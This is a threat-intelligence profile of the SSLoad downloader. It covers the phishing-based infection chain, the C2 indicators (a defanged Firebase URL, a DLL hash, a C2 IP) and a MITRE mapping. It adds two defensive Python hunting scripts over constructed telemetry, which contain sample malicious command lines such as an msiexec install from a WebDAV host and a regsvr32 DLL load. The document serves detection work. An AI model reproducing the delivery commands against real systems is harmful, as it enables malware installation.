| SSLoad | |
| --- | --- |
| Type of Malware | Dropper / downloader |
| Country of Origin | Unknown |
| Date of initial activity | 2024 |
| Targeted Countries | France |
| Associated Groups | TA578 |
| Motivation | Financial Gain |
| Attack Vectors | Phishing |
| Targeted Systems | Windows |
Overview
SSLoad is a Rust-based downloader that first appeared in January 2024 and has quickly become a common tool in cybercriminal toolkits. It is attributed to the threat actor group TA578 and has gone through several iterations. Early builds used a two-stage chain in which a first-stage DLL fetched C2 URLs from a Telegram channel; current builds drop that stage and retrieve secondary payloads with fewer external dependencies, which makes the infection both faster and quieter.
Targets
Organizations with Poor Security Posture: SSLoad has been observed hitting entities with weak security practices, such as outdated software, misconfigured systems, or inadequate network defenses, typically businesses and institutions without a mature security program.
Sectors with High Value: The initial reports do not name specific sectors. Loaders of this kind serve whatever follow-on payload the operator chooses, so the eventual victims are usually wherever that payload pays best: financial institutions, healthcare organizations, government agencies, and technology companies, where compromised systems hold valuable data or carry significant operational impact.
Geographical Focus: The profile above lists France, but the reports give no detailed geographic focus. A loader distributed by phishing can reach any region, and operators tend to concentrate on areas with less stringent cybersecurity regulation or a larger population of vulnerable systems.
Specific Campaigns and Delivery Methods: In one observed campaign, SSLoad was delivered through phishing emails disguised as submissions from the contact form on the victim's own website. Such messages arrive through a channel the organization expects unsolicited mail on, so they pass casual scrutiny and reach exactly the staff whose job is to open them.
How they operate
Infection Chain and Initial Access
SSLoad's infection chain starts with phishing emails that pose as benign contact-form submissions from the targeted organization's own website. The emails contain links to counterfeit Azure download pages or similar decoy sites, which redirect the victim to Firebase-hosted URLs serving a malicious JavaScript (.js) file. One observed Firebase URL is hxxps://firebasestorage.googleapis.com/v0/b/terfe-419414.appspot.com/o/I3Hl2Mxyqs%2FLetter_b23_98b161159-63t511248325-3676a8.js; when the script runs, it downloads a Microsoft Installer (.msi) package.
Execution and Installation
When the victim opens the .js file, it runs under wscript.exe, which retrieves the .msi package from a WebDAV server and launches it. The installer drops the SSLoad Dynamic Link Library (DLL), SHA256 09ffc4188bf11bf059b616491fcb8a09a474901581f46ec7f2c350fbda4e1e1c, into the user's profile at C:\Users\[username]\AppData\Local\sharepoint\MenuEx.dll and loads it with regsvr32.exe. No user interaction is required after the initial click, and because regsvr32.exe is a signed Windows binary the DLL load blends in with legitimate activity and draws less scrutiny from users and default endpoint protections.
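The chain above (wscript.exe running a .js, an .msi fetched from WebDAV, regsvr32.exe loading a DLL from AppData\Local\sharepoint) is easy to hunt for in process-creation telemetry. The following is an added example written for this page, not code from the original report or from any vendor. It runs over constructed Sysmon-style Event ID 1 records; the command lines, PIDs and the `target_hash` field (the SHA256 of the file passed on the command line, which some EDRs record) are assumptions made for the demonstration, and only the DLL path and hash come from the text above. Process ancestry through the Windows Installer service is simplified to a direct msiexec.exe parent.

```python
"""Hunt for the SSLoad delivery chain in process-creation telemetry (added example)."""
import re

# SHA256 of the SSLoad DLL named in the report.
SSLOAD_DLL_SHA256 = "09ffc4188bf11bf059b616491fcb8a09a474901581f46ec7f2c350fbda4e1e1c"

# Constructed Sysmon-style process-creation records (not real telemetry).
# Command lines and the target_hash field are assumptions for illustration.
EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe", "target_hash": ""},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\alice\Downloads\Letter_b23.js"', "target_hash": ""},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'msiexec.exe /i "\\203.0.113.10@SSL\DavWWWRoot\update.msi" /qn',
     "target_hash": ""},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r'regsvr32.exe /s "C:\Users\alice\AppData\Local\sharepoint\MenuEx.dll"',
     "target_hash": SSLOAD_DLL_SHA256},
    # Benign noise: an administrator registering a vendor DLL from Program Files.
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r'regsvr32.exe /s "C:\Program Files\Vendor\plugin.dll"', "target_hash": ""},
]

# WebDAV UNC forms: \\host@SSL\..., \\host@8080\..., or the DavWWWRoot marker.
WEBDAV_RE = re.compile(r"\\\\[^\\\s\"]+@(?:SSL|\d+)\\|DavWWWRoot", re.IGNORECASE)
# The drop directory used by the SSLoad installer.
SHAREPOINT_DLL_RE = re.compile(r"\\AppData\\Local\\sharepoint\\[^\\\"]+\.dll", re.IGNORECASE)


def image_name(event):
    """Basename of the executable, lower-cased for comparison."""
    return event["image"].rsplit("\\", 1)[-1].lower()


def ancestors(event, by_pid):
    """Yield the process's ancestors, closest first, guarding against PID reuse loops."""
    seen = set()
    cur = by_pid.get(event["ppid"])
    while cur is not None and cur["pid"] not in seen:
        seen.add(cur["pid"])
        yield cur
        cur = by_pid.get(cur["ppid"])


def classify(event, by_pid):
    """Return the list of rule names this event trips (empty when nothing matches)."""
    name = image_name(event)
    cmd = event["cmdline"]
    hits = []
    if name == "wscript.exe" and re.search(r"\.jse?\"?\s*$", cmd, re.IGNORECASE):
        hits.append("wscript_runs_js")
    if name == "msiexec.exe" and WEBDAV_RE.search(cmd):
        hits.append("msiexec_webdav_source")
    if name == "regsvr32.exe" and SHAREPOINT_DLL_RE.search(cmd):
        hits.append("regsvr32_appdata_sharepoint_dll")
    if event.get("target_hash", "").lower() == SSLOAD_DLL_SHA256:
        hits.append("known_ssload_dll_hash")
    # Chain rule: installer or DLL loader that descends from a script host.
    if name in ("msiexec.exe", "regsvr32.exe") and any(
            image_name(a) == "wscript.exe" for a in ancestors(event, by_pid)):
        hits.append("descends_from_wscript")
    return hits


def hunt(events):
    """Map PID -> tripped rules for every event that matched at least one rule."""
    by_pid = {e["pid"]: e for e in events}
    findings = {}
    for e in events:
        hits = classify(e, by_pid)
        if hits:
            findings[e["pid"]] = hits
    return findings


if __name__ == "__main__":
    for pid, rules in hunt(EVENTS).items():
        print(pid, ", ".join(rules))
```

The chain rule is the one worth keeping in production: any single rule above has benign matches (administrators do run regsvr32.exe, and msiexec.exe does install from network shares), but an .msi or DLL load whose lineage passes through wscript.exe is rare enough on a workstation to page on.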
Command-and-Control Communication
SSLoad's command-and-control infrastructure is built to stay quiet. Early versions fetched additional payload URLs from a Telegram channel named 'SSLoad'. Later iterations removed the first-stage DLL entirely: SSLoad now loads directly on the victim's machine and talks to its C2 servers over HTTPS, obfuscating the data it transmits to frustrate inspection. Observed C2 traffic includes connections to 85.239.53.219. The malware also queries api.ipify.org to learn the victim's public IP address; this is a reconnaissance lookup against a legitimate service, not a command channel, but it is a useful correlation point because it precedes the C2 check-in.
Persistence and Evasion Techniques
SSLoad establishes persistence so that it survives reboots, reportedly by creating scheduled tasks or adding startup entries that relaunch it at logon. For evasion it obfuscates and encrypts its payloads, and the secondary payloads it fetches are typically decrypted and executed directly in memory, which keeps their footprint on disk small and makes them harder to capture and analyze.
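Two of the indicators in the preceding paragraphs (the api.ipify.org lookup followed by a connection to 85.239.53.219, and a persistence entry that reloads the DLL from AppData\Local\sharepoint) can be correlated per host. The following is an added example written for this page, not code from the report or any vendor. It runs over constructed Sysmon-style DNS-query and network-connection records plus a Windows scheduled-task-created record; the hostnames, timestamps, the scheduled-task name and the assumption that the DLL's traffic originates from the regsvr32.exe process are all made up for the demonstration, and only api.ipify.org, the C2 IP and the drop path come from the text above.

```python
"""Correlate SSLoad network and persistence indicators per host (added example)."""
from datetime import datetime, timedelta

# Indicators taken from the report.
C2_IPS = {"85.239.53.219"}
IP_CHECK_DOMAINS = {"api.ipify.org"}
DROP_DIR = "\\appdata\\local\\sharepoint\\"
# How long after the public-IP lookup a C2 connection still counts as related (assumption).
WINDOW = timedelta(minutes=10)


def ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


# Constructed Sysmon Event ID 22 style DNS-query records (not real telemetry).
DNS_EVENTS = [
    {"host": "WS01", "time": ts("2024-04-02 09:14:05"),
     "process": r"C:\Windows\System32\regsvr32.exe", "query": "api.ipify.org"},
    {"host": "WS07", "time": ts("2024-04-02 11:30:00"),
     "process": r"C:\Program Files\Mozilla Firefox\firefox.exe", "query": "api.ipify.org"},
]
# Constructed Sysmon Event ID 3 style network-connection records.
NET_EVENTS = [
    {"host": "WS01", "time": ts("2024-04-02 09:14:09"),
     "process": r"C:\Windows\System32\regsvr32.exe", "dst_ip": "85.239.53.219", "dst_port": 443},
    {"host": "WS07", "time": ts("2024-04-02 11:30:02"),
     "process": r"C:\Program Files\Mozilla Firefox\firefox.exe", "dst_ip": "198.51.100.7", "dst_port": 443},
]
# Constructed Windows 4698 (scheduled task created) records; task names are assumptions.
TASK_EVENTS = [
    {"host": "WS01", "task": r"\Microsoft\Windows\SharePointSync",
     "action": r'regsvr32.exe /s "C:\Users\alice\AppData\Local\sharepoint\MenuEx.dll"'},
    {"host": "WS07", "task": r"\Microsoft\Windows\Defrag\ScheduledDefrag",
     "action": r"%windir%\system32\defrag.exe -c -h -o -$"},
]


def c2_sequences(dns_events, net_events, window=WINDOW):
    """(host, process, c2_ip) where a public-IP lookup is followed within `window`
    by a connection to a known C2 IP from the same process image on the same host."""
    hits = []
    for d in dns_events:
        if d["query"].lower() not in IP_CHECK_DOMAINS:
            continue
        for n in net_events:
            same_origin = n["host"] == d["host"] and n["process"].lower() == d["process"].lower()
            in_window = timedelta(0) <= n["time"] - d["time"] <= window
            if same_origin and in_window and n["dst_ip"] in C2_IPS:
                hits.append((d["host"], n["process"], n["dst_ip"]))
    return hits


def direct_c2_connections(net_events):
    """Every connection to a C2 IP, with or without a preceding ipify lookup:
    the lookup is enrichment for triage, not a prerequisite for blocking."""
    return [(n["host"], n["dst_ip"], n["dst_port"]) for n in net_events if n["dst_ip"] in C2_IPS]


def suspicious_tasks(task_events):
    """Scheduled tasks whose action loads anything from the SSLoad drop directory."""
    return [(t["host"], t["task"]) for t in task_events if DROP_DIR in t["action"].lower()]


def triage(dns_events, net_events, task_events):
    """Sorted list of hosts that tripped any of the three checks."""
    hosts = {h for h, _, _ in c2_sequences(dns_events, net_events)}
    hosts |= {h for h, _, _ in direct_c2_connections(net_events)}
    hosts |= {h for h, _ in suspicious_tasks(task_events)}
    return sorted(hosts)


if __name__ == "__main__":
    print("sequence hits:", c2_sequences(DNS_EVENTS, NET_EVENTS))
    print("direct C2:", direct_c2_connections(NET_EVENTS))
    print("tasks:", suspicious_tasks(TASK_EVENTS))
    print("hosts to isolate:", triage(DNS_EVENTS, NET_EVENTS, TASK_EVENTS))
```

Note that WS07 also resolves api.ipify.org, from a browser, and is correctly not flagged: the lookup on its own is common and benign, which is why the block matches on the C2 address and the drop path and uses the lookup only to tie the events together.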
MITRE Tactics and Techniques
1. Initial Access
Phishing (T1566): SSLoad is initially delivered through phishing emails, often disguised as legitimate communication (e.g., contact forms). This technique involves sending malicious links or attachments to trick recipients into executing the malware.
2. Execution
User Execution: Malicious File (T1204.002): The malware relies on the user to open a JavaScript (.js) file, which then downloads and runs the SSLoad payload. Nothing is exploited; the chain depends entirely on that one click.
3. Persistence
Scheduled Task/Job (T1053) and Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (T1547.001): SSLoad establishes persistence by creating a scheduled task or adding a startup entry so that it is relaunched after reboot.
4. Command and Control
Encrypted Channel (T1573): SSLoad communicates with its command and control (C2) server over encrypted HTTPS, which hides the content of its traffic from network inspection.
Web Service (T1102): SSLoad has been seen using legitimate services (such as Firebase or Telegram channels) to host or retrieve components. This method can obscure the malware’s activity and make it harder to detect.
5. Collection
Data from Local System (T1005): As a downloader, SSLoad can deliver payloads that gather data from the infected system; the reports do not detail collection by SSLoad itself, so treat this as capability of the follow-on stage rather than an observed behaviour.
6. Exfiltration
Exfiltration Over Command and Control Channel (T1041): SSLoad can exfiltrate data over the same channel used for C2 communication, utilizing the encrypted traffic to send collected information back to the attackers.
7. Defense Evasion
Obfuscated Files or Information (T1027): SSLoad uses various techniques to obfuscate its presence, including encrypted payloads and disguising itself as legitimate files.
8. Privilege Escalation
Process Injection (T1055): Not observed in the reports, but loaders of this kind commonly inject their in-memory payloads into other processes to avoid detection; listed here as a likely rather than a confirmed technique.